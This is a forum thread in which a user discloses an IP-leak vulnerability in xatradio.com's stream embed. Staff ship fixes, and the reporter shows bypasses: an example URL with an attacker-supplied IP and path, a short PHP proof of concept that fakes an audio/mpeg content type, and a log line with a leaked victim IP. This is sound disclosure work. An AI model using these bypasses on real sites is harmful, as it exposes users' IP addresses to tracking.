Jump to content

Vulnerability on xatradio.com / xat's group pages and xatspaces.


iGuano

Recommended Posts

  • Members
22 minutes ago, Lamingtons said:

Thank you for the report. It was fixed if you have future issues with xatRadio try to contact us via http://xatproject.com/support/.

 

Good job.  Thanks I'll notify xatradio.com specific vulnerabilities there from now on.

26 minutes ago, Lamingtons said:

Thank you for the report. It was fixed if you have future issues with xatRadio try to contact us via http://xatproject.com/support/.

 

On second-glance, it appears you have published an incomplete fix.

I notice you now no longer allow a path (/x.png) in the 'ip' parameter, however if I simply put the domain itself without the path it still works).

 

In this case, all I would have to do is have my domain automatically redirect to the png file and it would still work.

This is still fully exploitable.

  • Award 1
Link to comment
Share on other sites

  • Bot Service Providers
6 minutes ago, iGuano said:

 

Good job.  Thanks I'll notify xatradio.com specific vulnerabilities there from now on.

 

On second-glance, it appears you have published an incomplete fix.

I notice you now no longer allow a path (/x.png) in the 'ip' parameter, however if I simply put the domain itself without the path it still works).

 

In this case, all I would have to do is have my domain automatically redirect to the png file and it would still work.

This is still fully exploitable.

 

No, you can't, only whitelisted URLs will work. It will display BlockedDomain.

Link to comment
Share on other sites

  • Members
3 minutes ago, Lamingtons said:

No, you can't, only whitelisted URLs will work. It will display BlockedDomain.

 

Yes but I can supply my server IP, not needing a domain at all.

So whitelisting URLS doesn't make a difference.

 

For example, xatradio.com/html5.php?ip=127.0.0.1&port=80&extra=/;stream.mp3

  • Award 4
Link to comment
Share on other sites

  • Bot Service Providers
1 hour ago, iGuano said:

 

Yes but I can supply my server IP, not needing a domain at all.

So whitelisting URLS doesn't make a difference.

 

For example, xatradio.com/html5.php?ip=127.0.0.1&port=80&extra=/;stream.mp3

 

Ok, thank you again. We're working on it will be fixed.

Link to comment
Share on other sites

  • Members
6 hours ago, Lamingtons said:

Ok, thank you again. We're working on it will be fixed.

 

Good job, that second fixed seems to have done the trick.  I have to pop out, but I'll have another look later and see if it is still vulnerable.

Link to comment
Share on other sites

  • Members
10 hours ago, Lamingtons said:

Ok, thank you again. We're working on it will be fixed.

 

I've had a look at your second fix.

This time it seems you now block all mime types except "audio/mpeg".  However the IP leakage issue is still present.

 

You would have to actually proxy the stream through your server to avoid this issue, maybe it is a risk xat is willing to take.

 

I created another quick POC, I'll post it below:

 

index.php

<?php
header('Content-Type: audio/mpeg');
?>

 

Now that I've bypassed the mime type blocking, I can still log IP addresses.

 

Server log

[leaked victim ip] - - [04/Mar/2017] "GET /;stream.mp3 HTTP/1.1" 200 15 "http://chatsgroup.com/web_gear/chat/media.php?d=[snip]&p=0&id=[snip]" "Mozilla/5.0 [snip]

 

You can make use of the proxy_pass feature in Nginx to achieve this.  

  • Award 1
Link to comment
Share on other sites

  • Junior locked this topic
Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.